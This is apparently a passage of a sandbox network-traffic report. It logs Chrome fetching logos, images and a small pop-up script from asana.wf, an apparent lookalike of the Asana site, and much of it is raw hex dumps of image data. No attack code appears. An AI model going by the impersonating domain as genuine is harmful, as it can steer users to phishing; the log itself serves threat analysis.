                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: 36 99 6e 18 be 18 86 2f 86 e1 8b 61 f8 62 bc e8 08 0c 5f 8c 27 39 60 f8 62 3c c9 81 27 6d 83 e5 8b 61 f9 62 58 be 0a 96 2f 86 e5 8b e5 51 c6 3e c6 d8 4e 3e e7 21 30 02 de e6 80 e9 fd b2 88 31 5c f4 5f 4a 9d 32 ae 95 33 8f 0a 74 77 53 56 52 9e 46 6a a8 eb e5 ba 9f 3e 02 d4 09 21 75 da 2b 1d b0 bf f2 4c 07 ec af bc d3 81 77 1e 81 f9 ab 60 fe 2a 98 bf 0a e6 77 c3 fc c5 30 bf 0f af 75 e0 b5 39 30 bf 17 e6 f7 c2 fc 5e 98 bf 14 2f 76 c0 fc 55 30 7f 08 e6 0f c1 fc 21 98 3f 04 f3 87 60 fe 10 9e bc 13 f6 f7 c1 fe 3e d8 df 07 fb fb f0 6c 07 9e ed c0 b3 1d 78 b6 03 cf 76 e0 d9 0e 3c db 81 67 3b f0 6c 07 9e ed c0 b3 1d 78 b6 03 cf ce c6 b3 77 12 01 5c 44 00 17 11 a0 98 08 e0 22 02 b8 88 00 2e 22 40 88 bd fb 10 f6 4d 73 c9 c1 56 10 af a7 22 57 13 ab 06 21 69 ec a3 2e
                                                                                                                                                                                                                    Data Ascii: 6n/ab_'9`b<'mabX/Q>N>!01\_J23twSVRFj>!u+Lw`*w0u90^/vU0!?`>lxv<g;lxw\D"."@MsV"W!i.
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: fa 6d 2d f5 a6 96 7a 4b ab f7 d3 84 d9 71 6f 50 dd 27 06 e8 b7 a7 d4 1d fc 9e 6f 4c 95 e9 37 95 d4 db 47 ea cd 23 f5 d6 51 23 fe 1e 7b b3 c8 fb a9 37 85 d4 db 3d d7 30 9b 42 66 93 cb 6c 72 99 4d 2e b3 c9 65 36 35 cc 24 97 99 e4 32 93 5c 66 92 cb 4c 72 99 49 2e 33 c9 65 26 b9 cc 24 97 99 e4 32 93 5c 66 92 cb 4c 72 99 49 2e 33 c9 65 26 b9 cc 24 97 99 e4 32 93 1a 66 52 c3 4c 6a 98 49 0d 33 c9 65 26 b9 cc 24 97 59 e4 32 8b 1a 66 a1 7e 93 2d 97 59 e4 5a b3 c8 65 16 b9 cc 22 97 59 e4 5a b3 c8 65 16 ea 19 62 2e b3 c8 65 16 b9 cc 22 97 59 c4 b2 ba 5a 2c 55 8b a5 6a b1 54 2d 96 aa 15 52 2c e4 4a 7f f5 17 d1 40 fd 30 31 42 8c 12 63 c5 38 31 5e ff 15 d1 2b c4 54 71 83 98 2d 6e 25 cf 9a 27 1e 12 8f 88 1f 89 c7 c4 7f 88 9f 88 27 c4 93 e2 69 f1 3b f1 ac 58 29 de 17 1b
                                                                                                                                                                                                                    Data Ascii: m-zKqoP'oL7G#Q#{7=0BflrM.e65$2\fLrI.3e&$2\fLrI.3e&$2fRLjI3e&$Y2f~-YZe"YZeb.e"YZ,UjT-R,J@01Bc81^+Tq-n%''i;X)
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: ec 99 d2 43 5a 08 5f 56 d1 f5 2b 10 c2 cb 7b 7a 8b 6a 29 f7 2f 2e 85 6f a8 dd 9a 5f 33 ce 83 f3 12 3e 37 9e 08 f3 18 46 24 63 25 4a 5a 8d 78 00 3e 3d ef 4c 82 90 dd 5b 4a 8b ee df 75 ca b1 22 7f 49 60 ba f6 14 08 63 fe 48 bb ed e9 2a 1e f6 61 7e 01 c2 06 8b e3 bd c2 43 e5 cc 0f 68 2f c3 21 ed d4 41 b8 43 39 bd 86 f0 c5 28 c0 0a 71 cc 03 00 e1 01 01 00 b3 1e 50 b4 e9 a8 d3 d8 92 ba 9c e4 8a e1 e6 a6 ee a3 bd 69 1d c9 c1 c2 b5 2e 65 cb 12 4a e3 23 db ba 07 0e 39 ed ae 0f cc 29 4f 89 a9 f1 f2 90 0c 97 b4 ec 51 26 a5 07 05 47 e5 65 6b 95 c9 4e 12 e9 68 75 dd 1e 4c 7b 1e 70 3d 9b 30 4f 84 16 2e 3c 4c 90 4a 80 cb 3f a8 fe ef 27 a9 93 6b d7 1a db d0 33 75 50 de ff 0c 3e b3 14 ef 0c d4 79 11 51 b3 d4 4d fd ec 24 f3 87 63 93 1d e5 2b 9b 27 41 f4 fe cb 97 77 83 0f
                                                                                                                                                                                                                    Data Ascii: CZ_V+{zj)/.o_3>7F$c%JZx>=L[Ju"I`cH*a~Ch/!AC9(qPi.eJ#9)OQ&GekNhuL{p=0O.<LJ?'k3uP>yQM$c+'Aw
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: 4b 91 a7 79 a5 a5 bb 6e 74 72 d2 22 63 0e e7 15 fd 01 be 9d 86 fd 80 52 7b 59 1b 78 9c 34 9c a5 b1 82 cd c2 1b 1f 1b e3 85 e7 38 df 31 ca 07 4e c7 fa 84 88 68 04 e8 4d 1a a4 34 4f 4d 71 9e 02 3c df e7 c8 6b 85 75 07 f8 1c cd 3e 27 06 09 cd 70 54 6c db e3 01 a9 b9 4f e0 73 55 90 77 2d 41 19 87 12 c2 3d 74 2c fb 80 6f 9c 45 66 3b 15 ae 52 22 26 d5 ea 06 57 66 61 aa 93 9c a9 d7 e0 18 19 90 07 cd 33 c6 de 82 2e 21 1a 23 38 1c 8d 21 86 00 f0 8c 6b b2 2e 54 0b ec 82 fb 0f 2c 15 08 e4 7c 6b 17 02 2d dc 5b 4c 61 e3 d9 7f b2 92 d8 a9 48 5c cf 7e 99 8a f0 e1 02 df 23 b5 8f 9e ac c7 06 f2 18 5a 28 b5 1c e3 32 aa 83 d4 ba 57 16 03 99 2b 34 87 bd c7 a8 11 2d 2a 67 34 36 a4 46 b0 96 2f c1 87 a0 12 7e fe 02 eb 42 4b f0 5a 58 0e 82 22 0a 67 08 7b f0 47 c9 56 9c 91 f3 00
                                                                                                                                                                                                                    Data Ascii: Kyntr"cR{Yx481NhM4OMq<ku>'pTlOsUw-A=t,oEf;R"&Wfa3.!#8!k.T,|k-[LaH\~#Z(2W+4-*g46F/~BKZX"g{GV
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: b0 fe 47 74 4a a9 26 cf 37 ff c4 f3 41 be 5c 06 df 8c 63 7e cb f3 43 be 8d e7 73 85 63 44 b0 fb a1 47 d7 7c b2 fa 38 22 83 c7 3d 77 ee e0 74 f2 09 38 c0 b5 6b 9c 5a 7e 1e cf 9f 00 df fd 98 ad b9 55 8a 6d bc 92 c8 2f 39 b0 c2 ec 98 dc 50 61 e5 99 24 ce 4d a8 ab c3 71 b2 88 ed 0f 61 d0 5b ab eb 10 92 df 15 9a 15 76 88 03 b3 ca 8e 29 64 fe 58 2e 45 e2 37 38 7e a1 b4 e6 cd b4 fd 78 8e 9b 45 a8 cf 61 de e8 0e 3f b8 c1 14 cf 1f e9 a1 88 6f 03 db fb 41 56 f6 3e 6d df d5 f1 c3 5e 04 02 b4 fd 23 dc 4a 9d 7b 6c fc 1e ac cc 88 8a 70 ab 60 9a ed ba 40 e6 eb 03 c6 e5 9f 0a b9 3e e9 56 de 07 73 9f f4 17 39 10 b0 fb c1 ea a2 57 de d2 67 eb ec d5 e6 28 b8 3e e9 16 e3 ff 2b 7d d2 eb cc ee 8f 32 e7 f8 9b f7 49 e7 7b 46 16 76 0a fe 27 ef 8b fd ff eb 5d 55 ff ce fb 67 cd f7
                                                                                                                                                                                                                    Data Ascii: GtJ&7A\c~CscDG|8"=wt8kZ~Um/9Pa$Mqa[v)dX.E78~xEa?oAV>m^#J{lp`@>Vs9Wg(>+}2I{Fv']Ug
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: 20 b1 f0 f6 4e f2 3d dc 5c 18 64 17 74 38 5b b9 20 16 e1 b1 99 a4 4e 32 44 e0 b1 5b d7 cf 99 c7 83 b6 b2 ee dd 54 ea 26 9e e3 e9 b3 99 eb 48 a9 b1 f6 cf 20 68 ba 1c de 1b f3 16 72 7e d3 b0 bd bf 20 ef dd 19 6b c5 13 be ce 20 c8 d1 22 87 8f 33 51 d2 55 62 e6 48 13 98 dc a2 44 6c 8b b2 6d 46 97 6f 8c f3 c1 9d 64 2b 5a 22 19 1c 0c 69 23 5b 11 9c a1 48 71 f9 79 d3 83 7c 0e f5 1c 51 6b ca 91 5f 49 8c 7a 12 3a 6e 86 f1 a3 d2 8a 6f d1 a5 5e 3b 77 76 e0 67 6f 56 e7 19 9b d6 2a 83 f9 dd 33 19 2c 92 f2 a6 32 68 64 65 ca 8c 12 28 ab f4 bd d3 25 d0 79 e5 ce e6 15 1b 9d b2 1b 18 2b a6 b8 a5 68 1d ac 24 72 a8 a6 62 1e 0a 74 4b af 6c 08 60 52 78 89 f8 f0 b6 1a 2a 2d 3d 9a f1 5b a4 15 52 39 3d 4c 26 2e 61 fe 28 0e b6 3e ec b5 f0 58 c7 de 94 c9 fa e6 ed 98 65 23 96 8e a0
                                                                                                                                                                                                                    Data Ascii: N=\dt8[ N2D[T&H hr~ k "3QUbHDlmFod+Z"i#[Hqy|Qk_Iz:no^;wvgoV*3,2hde(%y+h$rbtKl`Rx*-=[R9=L&.a(>Xe#
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC15INData Raw: f9 ff 01 b7 37 4a 94 00 01 58 f6 d0 a4 00 00
                                                                                                                                                                                                                    Data Ascii: 7JX


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    9192.168.2.164970994.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC606OUTGET /img/logo-ratio-40pxheight-Johnson-Johnson.svg HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC180INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:57 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Content-Length: 271
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC271INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 73 61 6e 61 2e 77 66 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at asana.wf Port 443</address>


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    10192.168.2.164971194.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC595OUTGET /img/logo-ratio-40pxheight-Dell.svg HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC253INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:57 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "740-6164f3d154651"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 1856
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC1856INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 35 30 22 20 68 65 69 67 68 74 3d 22 34 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 35 30 20 34 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 37 35 20 30 43 37 31 2e 30 34 34 34 20 30 20 36 37 2e 31 37 37 36 20 31 2e 31 37 32 39 38 20 36 33 2e 38 38 38 36 20 33 2e 33 37 30 36 31 43 36 30 2e 35 39 39 36 20 35 2e 35 36 38 32 34 20 35 38 2e 30 33 36 32 20 38 2e 36 39 31 38 31 20 35 36 2e 35 32 32 34 20 31 32 2e 33 34 36 33 43 35 35 2e 30 30 38 37 20 31 36 2e 30 30 30 39 20 35 34 2e 36 31 32 36 20 32 30 2e 30 32 32 32 20 35 35 2e 33 38 34 33 20 32 33 2e 39 30 31 38 43 35 36 2e 31
                                                                                                                                                                                                                    Data Ascii: <svg width="150" height="40" viewBox="0 0 150 40" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M75 0C71.0444 0 67.1776 1.17298 63.8886 3.37061C60.5996 5.56824 58.0362 8.69181 56.5224 12.3463C55.0087 16.0009 54.6126 20.0222 55.3843 23.9018C56.1


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    11192.168.2.164971394.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC370OUTGET /img/logo-ratio-40pxheight-McKesson.svg HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC253INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:57 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "ce4-6164f3d154651"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 3300
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC3300INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 35 30 22 20 68 65 69 67 68 74 3d 22 34 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 35 30 20 34 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 37 2e 36 34 31 35 20 32 35 2e 36 39 37 38 48 32 37 2e 37 30 33 36 56 32 39 2e 30 37 32 36 48 33 37 2e 36 34 31 35 56 32 35 2e 36 39 37 38 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 34 35 20 31 30 2e 33 37 37 33 56 32 39 2e 30 37 37 33 48 31 33 39 2e 38 32 35 43 31 33 39 2e 38 32 35 20 32 39 2e 30 37 37 33 20 31 33 33 2e 35 35 32 20 31 37 2e 39 33 32 36 20 31 33 32 2e 38 34 36 20 31 36 2e 36
                                                                                                                                                                                                                    Data Ascii: <svg width="150" height="40" viewBox="0 0 150 40" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M37.6415 25.6978H27.7036V29.0726H37.6415V25.6978Z" fill="black"/><path d="M145 10.3773V29.0773H139.825C139.825 29.0773 133.552 17.9326 132.846 16.6


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    12192.168.2.164971294.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC510OUTGET /pop-up.js HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:57 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "12d-6164f3d154651"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 301
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC301INData Raw: 6c 65 74 20 63 6c 6f 73 65 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 6f 70 55 70 43 6c 6f 73 65 64 27 29 3b 0d 0a 6c 65 74 20 70 6f 70 55 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 6f 70 2d 75 70 27 29 3b 0d 0a 0d 0a 0d 0a 63 6c 6f 73 65 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 70 6f 70 55 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 6e 6f 6e 65 27 3b 0d 0a 7d 29 3b 0d 0a 0d 0a 2f 2f 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 2f 2f 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27
                                                                                                                                                                                                                    Data Ascii: let closed = document.getElementById('popUpClosed');let popUp = document.getElementById('pop-up');closed.addEventListener('click', function() { popUp.style.display = 'none';});// setTimeout(function() {// document.getElementById('


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    13192.168.2.164971594.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC365OUTGET /img/HOME24-web-hero-3x-en-US.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC228INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:57 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "438de-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 276702
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC7964INData Raw: 52 49 46 46 d6 38 04 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 ff 0e 00 2a 04 00 41 4c 50 48 44 28 01 00 01 19 37 6e 1b 49 12 2c 8c 77 83 ea ff bf f8 aa be 26 9a 20 a2 ff 13 a0 f9 a1 2d 7f 0b 2e 00 5b b0 e0 4b 88 83 a8 3f 94 49 17 64 b0 0b a5 07 4a 02 e7 a2 8f 3d e2 5a 7c 98 c4 51 d4 1b 28 43 d3 8f 90 fb 50 12 88 23 94 04 e8 02 32 38 02 df 51 4a 8c 11 6d a2 c4 18 d0 82 76 cb 6e 58 b6 2d 79 c8 f2 bf 9e 32 4a 62 dc 46 92 a2 ae ca 3f eb 65 38 78 46 c4 04 a4 4e af d3 99 e8 68 58 ab 9a d8 0c ff b9 6a b0 b9 4a 15 54 a3 d6 4a d8 21 d6 89 95 9b e6 b1 3c ea 49 6d 82 2a e0 74 c0 7a b0 84 b2 24 49 8a 24 2b 63 1f 33 bf 23 bf 3b fe ff 57 f0 95 99 99 5d a4 d3 21 32 6b a0 e7 61 c4 04 50 82 24 c9 76 db ac e4 0f 10 00 99 dd 6f 00 0e 14 3e fa c4 01 db b6 65 db 9c
                                                                                                                                                                                                                    Data Ascii: RIFF8WEBPVP8X*ALPHD(7nI,w& -.[K?IdJ=Z|Q(CP#28QJmvnX-y2JbF?e8xFNhXjJTJ!<Im*tz$I$+c3#;W]!2kaP$vo>e
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: 84 42 db 29 f6 ea b6 08 28 0c 31 8c 8f 11 4d 4c 1c 16 d1 97 68 04 9b e3 b3 54 a2 6b c4 5f 75 0d 63 8a 3c be 4f 08 36 e9 78 9e ee 43 e1 d8 22 8f 92 30 cc 13 5a 80 3e f0 c8 43 01 1f 12 76 e4 f1 87 f3 2c c4 3c ac 58 a9 47 12 69 2c f6 01 01 c4 50 ac 40 bc 20 ea 00 1b d2 2f 20 16 e7 2d 0c c1 7f cb ad 3a 44 02 21 bb 3c 4d a8 e7 0b e9 ce ab 2e 94 6d 8c 45 07 99 c2 e7 b8 62 99 51 3f 12 8e c7 a9 f2 14 7b 55 e4 9f af 22 88 b2 62 7a 83 34 25 4d de b3 0c e0 c1 25 4d ea 47 21 20 02 50 83 25 15 7d 5c 01 8d 91 ef 28 0a c8 26 53 7c 95 c7 6e 63 9d 67 a3 1a 79 a0 0d f4 ae c9 08 0b 91 6f a3 6e 89 7b 15 59 0e 01 c3 18 5b 12 9d 31 8f 63 8b 3c 1b e0 a1 0c 66 4a 15 68 9f 46 9e 40 d1 21 cd 87 22 0c 51 4f 31 86 8d 3c 4a ea e6 59 38 9a 07 7c d9 b3 2b c0 f8 fe 03 13 60 ef ef bf 4b
                                                                                                                                                                                                                    Data Ascii: B)(1MLhTk_uc<O6xC"0Z>Cv,<XGi,P@ / -:D!<M.mEbQ?{U"bz4%M%MG! P%}\(&S|ncgyon{Y[1c<fJhF@!"QO1<JY8|+`K
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: 05 fe ac d8 7f e6 b7 00 28 bb 20 3c 00 96 41 2d a4 d3 8c 69 03 19 79 b0 b9 6a 95 67 70 28 ab 90 a6 c9 d8 e8 c9 bc 82 a2 05 dc a8 ba ea 27 b2 02 04 0c c3 0a 29 f7 9f 97 9b 4b 2e 98 5b 26 91 99 aa 40 4c bf 5a 70 c0 cc 47 a6 3a 42 7f f5 d2 99 7c 9d fe e6 61 cc 7f 51 c2 4d 09 b0 c7 9d e7 ad f5 14 b0 a9 8a 11 3c 06 39 f2 88 00 99 ba b5 47 fd 9b 19 56 69 66 5e 07 a4 4f d5 e7 18 4c ba 8e 30 ec ab 29 d0 d6 5d e5 3f 66 2b c4 f5 2c 47 0f 09 9c 41 c4 06 51 4b c5 12 7a a5 eb 9b 32 b6 ab 7f a8 c1 7a 88 0c b3 bf 6c bd 6d 83 f8 98 cf 3d 9d 55 9e 4c dd 71 69 9b ba 26 18 88 99 17 be 34 ac a1 c2 f0 56 21 9f 88 d4 51 77 2e ed 70 bb e1 79 4a 6e 40 cd 6d 58 4b 94 10 3d d6 36 9f 7d af 64 11 c2 84 18 93 ac d1 4d c5 a9 82 41 12 51 f2 56 e7 34 a7 01 a7 bf 25 e4 34 91 28 c0 5c 92
                                                                                                                                                                                                                    Data Ascii: ( <A-iyjgp(')K.[&@LZpG:B|aQM<9GVif^OL0)]?f+,GAQKz2zlm=ULqi&4V!Qw.pyJn@mXK=6}dMAQV4%4(\
